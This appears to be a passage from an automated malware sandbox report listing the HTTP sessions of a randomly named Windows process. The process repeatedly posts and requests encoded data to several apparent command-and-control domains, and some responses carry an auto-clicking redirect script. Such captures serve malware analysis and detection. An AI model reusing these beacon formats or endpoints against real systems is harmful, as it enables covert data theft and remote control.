                                                                               Jan 11, 2025 09:28:13.070921898 CET  377 bytes  OUT  GET /t322/?DzLTc=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.yunlekeji.top
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                               Jan 11, 2025 09:28:14.008352995 CET  1236 bytes  IN  HTTP/1.1 404 Not Found
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Connection: close
                                                                              Date: Sat, 11 Jan 2025 08:28:08 GMT
                                                                              Content-Length: 910
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Download-Options: noopen
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Cache-Flow: 1316037755
                                                                              Origin-Agent-Cluster: ?0
                                                                              FAI-W-FLOW: 576032038
                                                                              FAI-W-AGENT-AID: 32663896
                                                                              Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                                              P3P: CP=CAO PSA OUR
                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                              Server: F-WEB
                                                                              Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="back" style="margin
                                                                               Jan 11, 2025 09:28:14.008491993 CET  165 bytes  IN  Data Ascii: -left: 0px;"><div class="backImg"></div><span class="backTxt"></span></div></a></div></div> </div></body></html>


                                                                               Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                               17  192.168.2.8  49928  45.141.156.114  80  3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                               Timestamp  Bytes transferred  Direction  Data
                                                                               Jan 11, 2025 09:28:19.075870991 CET  631 bytes  OUT  POST /iuvu/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.logidant.xyz
                                                                              Origin: http://www.logidant.xyz
                                                                              Referer: http://www.logidant.xyz/iuvu/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3BCFVAbaVzMwUUgoz2ttt2z25S532Qb9kLGBVHE=
                                                                               Jan 11, 2025 09:28:19.760360956 CET  691 bytes  IN  HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:28:19 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                               Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                               18  192.168.2.8  49944  45.141.156.114  80  3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                               Timestamp  Bytes transferred  Direction  Data
                                                                               Jan 11, 2025 09:28:21.621465921 CET  651 bytes  OUT  POST /iuvu/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.logidant.xyz
                                                                              Origin: http://www.logidant.xyz
                                                                              Referer: http://www.logidant.xyz/iuvu/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2bd5RRBznGV+oWxLQQKT4JtH8TWITzAk6KaPYFU
Jan 11, 2025 09:28:22.302723885 CET  691                IN         HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:28:22 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.8  49964        45.141.156.114  80                3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 09:28:24.169318914 CET  1668               OUT        POST /iuvu/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.logidant.xyz
                                                                              Origin: http://www.logidant.xyz
                                                                              Referer: http://www.logidant.xyz/iuvu/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Ascii: DzLTc= [TRUNCATED]
Jan 11, 2025 09:28:24.867408991 CET  691                IN         HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:28:24 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
20          192.168.2.8  49981        45.141.156.114  80                3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 09:28:26.711121082 CET  376                OUT        GET /iuvu/?DzLTc=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.logidant.xyz
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 09:28:27.387038946 CET  691                IN         HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Sat, 11 Jan 2025 08:28:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
21          192.168.2.8  49998        202.79.161.151  80                3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 09:28:32.962888002 CET  631                OUT        POST /36be/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.laohub10.net
                                                                              Origin: http://www.laohub10.net
                                                                              Referer: http://www.laohub10.net/36be/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTOXs1pqQRmMap+usE1dKpbK1yaCwtZG0z6uaDpxU=
Jan 11, 2025 09:28:33.767959118 CET  533                IN         HTTP/1.1 200 OK
                                                                              Server: Apache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: max-age=86400
                                                                              Age: 1
                                                                              Connection: Close
                                                                              Content-Length: 358
                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
22          192.168.2.8  49999        202.79.161.151  80                3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 09:28:35.511471987 CET  651                OUT        POST /36be/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.laohub10.net
                                                                              Origin: http://www.laohub10.net
                                                                              Referer: http://www.laohub10.net/36be/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKdZaBYbcxpbgNKz3mAxEly4iniIEA64CzvHWG3k
Jan 11, 2025 09:28:36.313288927 CET  533                IN         HTTP/1.1 200 OK
                                                                              Server: Apache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: max-age=86400
                                                                              Age: 1
                                                                              Connection: Close
                                                                              Content-Length: 358
                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
23          192.168.2.8  50000        202.79.161.151  80                3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 09:28:38.059536934 CET  1668               OUT        POST /36be/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.laohub10.net
                                                                              Origin: http://www.laohub10.net
                                                                              Referer: http://www.laohub10.net/36be/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Ascii: DzLTc= [TRUNCATED]
Jan 11, 2025 09:28:38.892605066 CET  533                IN         HTTP/1.1 200 OK
                                                                              Server: Apache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: max-age=86400
                                                                              Age: 1
                                                                              Connection: Close
                                                                              Content-Length: 358
                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.8  50001        202.79.161.151  80                3920  C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 11, 2025 09:28:40.632839918 CET  376                OUT        GET /36be/?m8=urJ0WtmP0FPTTB&DzLTc=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.laohub10.net
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 09:28:41.467186928 CET  533                IN         HTTP/1.1 200 OK
                                                                              Server: Apache
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: max-age=86400
                                                                              Age: 1
                                                                              Connection: Close
                                                                              Content-Length: 358
                                                                              Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              25 | 192.168.2.8 | 50002 | 188.114.97.3 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:28:46.607239008 CET | 634 | OUT | POST /kf1m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.zkdamdjj.shop
                                                                              Origin: http://www.zkdamdjj.shop
                                                                              Referer: http://www.zkdamdjj.shop/kf1m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6SCU/SaeVPsVgtJS8dA75tpo8JrJTHbFWlc8Tdg=


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              26 | 192.168.2.8 | 50003 | 188.114.97.3 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:28:49.157284975 CET | 654 | OUT | POST /kf1m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.zkdamdjj.shop
                                                                              Origin: http://www.zkdamdjj.shop
                                                                              Referer: http://www.zkdamdjj.shop/kf1m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tBD8KD/WwGtMGMMNK25Eg4+1pqXs9NIXEEQu1Al


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              27 | 192.168.2.8 | 50004 | 188.114.97.3 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:28:51.702677011 CET | 1671 | OUT | POST /kf1m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.zkdamdjj.shop
                                                                              Origin: http://www.zkdamdjj.shop
                                                                              Referer: http://www.zkdamdjj.shop/kf1m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T3gtYQtUlxM2LzX3HqT0smgfRgqYDWJ9C7NCcRZwmMIUYSVIsBLqg5Et+nsOiCOJJTwIfkch13Wrs96QvpJz5HABK7cgdjm0vXgKWccc9dtLo4WCGCb5OjjiSqtjySSR9g1self9dcmobtf0LHUfQS0Gk8HHKCkEUgG5KSUltAUIxcEnhtvVSJwzil6SR6FJ6x15fPKy4FffcpK6hcb1VuozF1IJ17rwGj/J+2D99YmKp2BwdbK4G8cGUMNWFjJzoaLVPXEKj+SyTVAuYpIyDiqSh0b5GlpB7VAhDsHO07fivWF0h7d3lPjJst98+w9h/BAcpUEXB18/+05nZaoR1Fy9E1VURXpMw5hkC1AJnuo7nP/0QkcbZFGfH8sKZd+0T48KZFkL81XPE3f63UV3T+SvZJWI/IqM39R++SfHxQLRpS30tW74SkLfXGYLoHvazjRIL14GgSlTuAk4CkDX+z6opO5sjZ0hppXJFqYTDR0KR6m0naYlaRwKawsjtNVg8tjLWHinw1CeWU6rv9aS8OtpAd9HEqn8hrTdElo4NaU45JRSoru3su0TIU92ZsZK5ECRDozWaDnSyYBTD81vaxGqkF+TM6I5Umpoqu56zEXPcKpNbZgIUgbG1P9f7iXWEWIysxSuYzLDqIG3/iDTBsNJbp8kUlHsWeoQ1/zrlrLqjZczPdL8W3hyp9K22oUS5x3j8LlFqso9HRUI0fXmoCrt4AJRmVYXrzaG5+YqcwywG/iwGO+RnaXPXROb33NPUxkWoMLG6iO9XN03k7v1KyJfJhVGQBmMRTQpdHr2Hw+P61TsuC1Gf1b2IM1MmD9zmoHg+NGmIjm+0C+3qf/1Zf9KmG93JcUkVa4jefDIDCbfkQx+aTVW4hfwa8LP5lU3XXlid/DElUYkAH0EJ+z68vTY5EfpkaRbApve2iTPboE9n0CfuYCNHRA6WyLTtj6ajncVf [TRUNCATED]


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              28 | 192.168.2.8 | 50005 | 188.114.97.3 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:28:54.242649078 CET | 377 | OUT | GET /kf1m/?DzLTc=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.zkdamdjj.shop
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:29:33.788362980 CET | 966 | IN | HTTP/1.1 522
                                                                              Date: Sat, 11 Jan 2025 08:29:33 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 15
                                                                              Connection: close
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kiS27%2BRCotCSBtiHG%2BcvRr%2B8qkxa8SFgh7W0qPXetOwF4PiiKFuxuqeIKZTNcw%2FLOcLUSN3RfXYyFzXIialM4ZbT%2FvThbZLQq7sfqK98PCPXNgaBWgFWzKyxdi%2Bw5oizVDJMQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Referrer-Policy: same-origin
                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 9003893978cc7274-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=377&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Ascii: error code: 522


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              29 | 192.168.2.8 | 50006 | 13.248.169.48 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:29:38.839350939 CET | 619 | OUT | POST /k1td/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.tals.xyz
                                                                              Origin: http://www.tals.xyz
                                                                              Referer: http://www.tals.xyz/k1td/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=lGkRzIOh6zQ2f3zfWLelqdNCH2OTlQd3XFt2AzJP0RPegoffkOSG3ZVsRsTgkP7cXcbIlqoHIvPwiKweYUERXlb3dgtoJT6NFEXYHgoAYdsM892pHXaxHefTs0GK4V2gxYS0NBlaaDDErjomh3YXjAU1k6kYKNrqJeY7ddc+QZhSFn6FzeKxz/WPM4sWeg/oPVPblc8=
                                                                              Jan 11, 2025 09:29:39.304763079 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              30 | 192.168.2.8 | 50007 | 13.248.169.48 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:29:41.385353088 CET | 639 | OUT | POST /k1td/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.tals.xyz
                                                                              Origin: http://www.tals.xyz
                                                                              Referer: http://www.tals.xyz/k1td/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Ascii: DzLTc=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0j7ehKXflPSGwZVsEcSkqv7tXcXqlqUHIuvwiPMeYk4WYVbiDAtuXj6NFEXYHjVdYd0M8NmpH2awZufcv0GKul2kxYSzNApwaBLErnsmgjEW2wUJ6Kl4D4O4Ou0AVP0qQ5x3JxLvp8C3w/+kM7EgbXiAV2fr7LqmFJxKVukQfcvdm+3FP45I
                                                                              Jan 11, 2025 09:29:41.832416058 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              31 | 192.168.2.8 | 50008 | 13.248.169.48 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 11, 2025 09:29:43.936975956 CET | 1656 | OUT | POST /k1td/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.tals.xyz
                                                                              Origin: http://www.tals.xyz
                                                                              Referer: http://www.tals.xyz/k1td/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:29:44.399095058 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
